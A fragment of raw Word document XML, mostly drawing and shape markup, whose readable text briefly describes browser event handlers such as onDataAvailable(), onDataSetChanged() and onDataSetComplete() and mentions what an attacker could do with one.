                              <a:gd name="T6" fmla="+- 0 186 4"/>
                              <a:gd name="T7" fmla="*/ 186 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1495"/>
                              <a:gd name="T10" fmla="+- 0 185 4"/>
                              <a:gd name="T11" fmla="*/ 185 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1495"/>
                              <a:gd name="T14" fmla="+- 0 165 4"/>
                              <a:gd name="T15" fmla="*/ 165 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1495"/>
                              <a:gd name="T18" fmla="+- 0 161 4"/>
                              <a:gd name="T19" fmla="*/ 161 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1495"/>
                              <a:gd name="T22" fmla="+- 0 25 4"/>
                              <a:gd name="T23" fmla="*/ 25 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1495"/>
                              <a:gd name="T26" fmla="+- 0 4 4"/>
                              <a:gd name="T27" fmla="*/ 4 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3404 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1495"/>
                              <a:gd name="T30" fmla="+- 0 4 4"/>
                              <a:gd name="T31" fmla="*/ 4 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3425 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1495"/>
                              <a:gd name="T34" fmla="+- 0 25 4"/>
                              <a:gd name="T35" fmla="*/ 25 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3425 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1495"/>
                              <a:gd name="T38" fmla="+- 0 165 4"/>
                              <a:gd name="T39" fmla="*/ 165 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3407 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1495"/>
                              <a:gd name="T42" fmla="+- 0 185 4"/>
                              <a:gd name="T43" fmla="*/ 185 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3404 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1495"/>
                              <a:gd name="T46" fmla="+- 0 186 4"/>
                              <a:gd name="T47" fmla="*/ 18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95" h="183">
                                <a:moveTo>
                                  <a:pt x="147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474" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1495" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1495" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1477" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="147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Text Box 109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"/>
                            <a:ext cx="149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onDataAvailable()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1" o:spid="_x0000_s1341" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:.2pt;width:74.75pt;height:9.15pt;z-index:-17633280;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,4" coordsize="149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">
                <v:shape id="Freeform 1093" o:spid="_x0000_s1342" style="position:absolute;left:1930;top:3;width:1495;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="149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sDO8IA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERP32vCMBB+F/wfwgl7kZm0Y7J1xiIDma9TwdejOZti&#10;cylN1nb7681gsLf7+H7eppxcKwbqQ+NZQ7ZSIIgrbxquNZxP+8cXECEiG2w9k4ZvClBu57MNFsaP&#10;/EnDMdYihXAoUIONsSukDJUlh2HlO+LEXX3vMCbY19L0OKZw18pcqbV02HBqsNjRu6XqdvxyGpbP&#10;P0/5ddh3lUVu1Gj4UucfWj8spt0biEhT/Bf/uQ8mzVevGfx+k06Q2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WwM7wgAAAN0AAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93&#10;bnJldi54bWxQSwUGAAAAAAQABAD1AAAAhwMAAAAA&#10;" path="m1474,182l21,182r-3,-1l,161r,-4l,21,21,,1474,r21,21l1495,161r-18,20l1474,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1474,186;21,186;18,185;0,165;0,161;0,25;21,4;1474,4;1495,25;1495,165;1477,185;1474,186" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1092" o:spid="_x0000_s1343" type="#_x0000_t202" style="position:absolute;left:1930;top:3;width:149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zP08QA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/wPyxR6q7v1IDW6ESkKhUIxxoPHaXaS&#10;LGZnY3ar6b93C4Xe5vE+Z7UeXSeuNATrWcPLVIEgrryx3Gg4lrvnVxAhIhvsPJOGHwqwzicPK8yM&#10;v3FB10NsRArhkKGGNsY+kzJULTkMU98TJ672g8OY4NBIM+AthbtOzpSaS4eWU0OLPb21VJ0P307D&#10;5sTF1l4+v/ZFXdiyXCj+mJ+1fnocN0sQkcb4L/5zv5s0Xy1m8PtNOkH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Mz9P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onDataAvailable()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9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>would</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>need</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>change</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>an</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>element,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>could</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>perform</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10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same</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>function)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2094"/>
          <w:tab w:val="left" w:pos="2096"/>
        </w:tabs>
        <w:spacing w:before="160"/>
        <w:ind w:left="2095" w:hanging="1906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371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1003300" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1087" name="Group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3300" cy="116205"/>
                          <a:chOff x="1930" y="166"/>
                          <a:chExt cx="1580" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1088" name="Freeform 1090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1580" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3489 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1580"/>
                              <a:gd name="T2" fmla="+- 0 348 166"/>
                              <a:gd name="T3" fmla="*/ 348 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1580"/>
                              <a:gd name="T6" fmla="+- 0 348 166"/>
                              <a:gd name="T7" fmla="*/ 348 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1580"/>
                              <a:gd name="T10" fmla="+- 0 348 166"/>
                              <a:gd name="T11" fmla="*/ 348 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1580"/>
                              <a:gd name="T14" fmla="+- 0 327 166"/>
                              <a:gd name="T15" fmla="*/ 327 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1580"/>
                              <a:gd name="T18" fmla="+- 0 324 166"/>
                              <a:gd name="T19" fmla="*/ 324 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1580"/>
                              <a:gd name="T22" fmla="+- 0 187 166"/>
                              <a:gd name="T23" fmla="*/ 187 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1580"/>
                              <a:gd name="T26" fmla="+- 0 166 166"/>
                              <a:gd name="T27" fmla="*/ 166 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3489 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1580"/>
                              <a:gd name="T30" fmla="+- 0 166 166"/>
                              <a:gd name="T31" fmla="*/ 166 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3510 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1580"/>
                              <a:gd name="T34" fmla="+- 0 187 166"/>
                              <a:gd name="T35" fmla="*/ 187 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3510 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1580"/>
                              <a:gd name="T38" fmla="+- 0 327 166"/>
                              <a:gd name="T39" fmla="*/ 327 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3492 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1580"/>
                              <a:gd name="T42" fmla="+- 0 348 166"/>
                              <a:gd name="T43" fmla="*/ 348 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3489 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1580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80" h="183">
                                <a:moveTo>
                                  <a:pt x="155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559" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1580" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1580" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1562" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="155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Text Box 108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158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onDataSetChang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ed()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88" o:spid="_x0000_s1344" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:8.3pt;width:79pt;height:9.15pt;z-index:-17632768;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,166" coordsize="158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">
                <v:shape id="Freeform 1090" o:spid="_x0000_s1345" style="position:absolute;left:1930;top:166;width:1580;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="158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TPd8MA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvDMAyF74X9B6PBbq2zDkbJ6payUtitrM3uWqwl&#10;obGc2lqa/fvpMNhN4j2992m9nUJvRkq5i+zgcVGAIa6j77hxUJ0P8xWYLMge+8jk4IcybDd3szWW&#10;Pt74ncaTNEZDOJfooBUZSmtz3VLAvIgDsWpfMQUUXVNjfcKbhofeLovi2QbsWBtaHOi1pfpy+g4O&#10;0lLi59NwlCN+dPvRVtdzXV2de7ifdi9ghCb5N/9dv3nFL1aKq9/oCHb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0TPd8MAAADdAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m1559,182l21,182r-3,l,161r,-3l,21,21,,1559,r21,21l1580,161r-18,21l1559,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1559,348;21,348;18,348;0,327;0,324;0,187;21,166;1559,166;1580,187;1580,327;1562,348;1559,348" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1089" o:spid="_x0000_s1346" type="#_x0000_t202" style="position:absolute;left:1930;top:166;width:158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HLf8MA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWsCMRC9C/6HMAVvmtSD6NYoUhSEgnRdDz1ON+Nu&#10;cDNZN6lu/31TELzN433Oct27RtyoC9azhteJAkFcemO50nAqduM5iBCRDTaeScMvBVivhoMlZsbf&#10;OafbMVYihXDIUEMdY5tJGcqaHIaJb4kTd/adw5hgV0nT4T2Fu0ZOlZpJh5ZTQ40tvddUXo4/TsPm&#10;i/OtvR6+P/NzbotiofhjdtF69NJv3kBE6uNT/HDvTZqv5gv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3HLf8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onDataSetChang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ed()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(fires</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>when</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8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data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>exposed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>source</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>object</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>changes)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2179"/>
          <w:tab w:val="left" w:pos="2180"/>
        </w:tabs>
        <w:ind w:left="2179" w:hanging="1990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422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1057275" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1084" name="Group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7275" cy="116205"/>
                          <a:chOff x="1930" y="154"/>
                          <a:chExt cx="1665" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1085" name="Freeform 1087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1665" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3574 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1665"/>
                              <a:gd name="T2" fmla="+- 0 336 154"/>
                              <a:gd name="T3" fmla="*/ 336 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1665"/>
                              <a:gd name="T6" fmla="+- 0 336 154"/>
                              <a:gd name="T7" fmla="*/ 336 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1665"/>
                              <a:gd name="T10" fmla="+- 0 336 154"/>
                              <a:gd name="T11" fmla="*/ 336 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1665"/>
                              <a:gd name="T14" fmla="+- 0 315 154"/>
                              <a:gd name="T15" fmla="*/ 315 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1665"/>
                              <a:gd name="T18" fmla="+- 0 312 154"/>
                              <a:gd name="T19" fmla="*/ 312 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1665"/>
                              <a:gd name="T22" fmla="+- 0 175 154"/>
                              <a:gd name="T23" fmla="*/ 175 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1665"/>
                              <a:gd name="T26" fmla="+- 0 154 154"/>
                              <a:gd name="T27" fmla="*/ 154 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3574 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1665"/>
                              <a:gd name="T30" fmla="+- 0 154 154"/>
                              <a:gd name="T31" fmla="*/ 154 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3595 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1665"/>
                              <a:gd name="T34" fmla="+- 0 175 154"/>
                              <a:gd name="T35" fmla="*/ 175 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3595 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1665"/>
                              <a:gd name="T38" fmla="+- 0 315 154"/>
                              <a:gd name="T39" fmla="*/ 315 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3577 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1665"/>
                              <a:gd name="T42" fmla="+- 0 336 154"/>
                              <a:gd name="T43" fmla="*/ 336 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3574 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1665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665" h="183">
                                <a:moveTo>
                                  <a:pt x="164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644" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1665" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1665" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1647" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="164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Text Box 108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166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onDataSetComplete()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85" o:spid="_x0000_s1347" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:7.7pt;width:83.25pt;height:9.15pt;z-index:-17632256;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,154" coordsize="166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">
                <v:shape id="Freeform 1087" o:spid="_x0000_s1348" style="position:absolute;left:1930;top:154;width:1665;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="166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/q4cMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERP32vCMBB+F/wfwgl7kTXZQCnVKGObU9CXdcPno7k1&#10;xeZSmkzrf28GA9/u4/t5y/XgWnGmPjSeNTxlCgRx5U3DtYbvr81jDiJEZIOtZ9JwpQDr1Xi0xML4&#10;C3/SuYy1SCEcCtRgY+wKKUNlyWHIfEecuB/fO4wJ9rU0PV5SuGvls1Jz6bDh1GCxo1dL1an8dRqm&#10;bv/xvsmvJZrp9nA6Vja+qUHrh8nwsgARaYh38b97Z9J8lc/g75t0gl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/q4cMAAADdAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m1644,182l21,182r-3,l,161r,-3l,21,21,,1644,r21,21l1665,161r-18,21l1644,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1644,336;21,336;18,336;0,315;0,312;0,175;21,154;1644,154;1665,175;1665,315;1647,336;1644,336" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1086" o:spid="_x0000_s1349" type="#_x0000_t202" style="position:absolute;left:1930;top:154;width:166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5fDcQA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/wPywi9Nbv2EGx0FRELhUIxpocex+yY&#10;LGZnY3ar6b93C4Xe5vE+Z7keXSeuNATrWcMsUyCIa28sNxo+q9enOYgQkQ12nknDDwVYryYPSyyM&#10;v3FJ10NsRArhUKCGNsa+kDLULTkMme+JE3fyg8OY4NBIM+AthbtOPiuVS4eWU0OLPW1bqs+Hb6dh&#10;88Xlzl4+jvvyVNqqelH8np+1fpyOmwWISGP8F/+530yar+Y5/H6TTp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uXw3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onDataSetComplete()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(fires</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>indicate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>available</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>source</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>object)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr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72"/>
        <w:ind w:left="421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161"/>
        <w:ind w:left="420" w:hanging="231"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:ind w:left="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>document)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="72"/>
        <w:ind w:left="190"/>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>(user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>double-clicks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form</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>element</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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link)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="161"/>
        <w:ind w:left="359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787008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-117475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="687070" cy="116205"/>
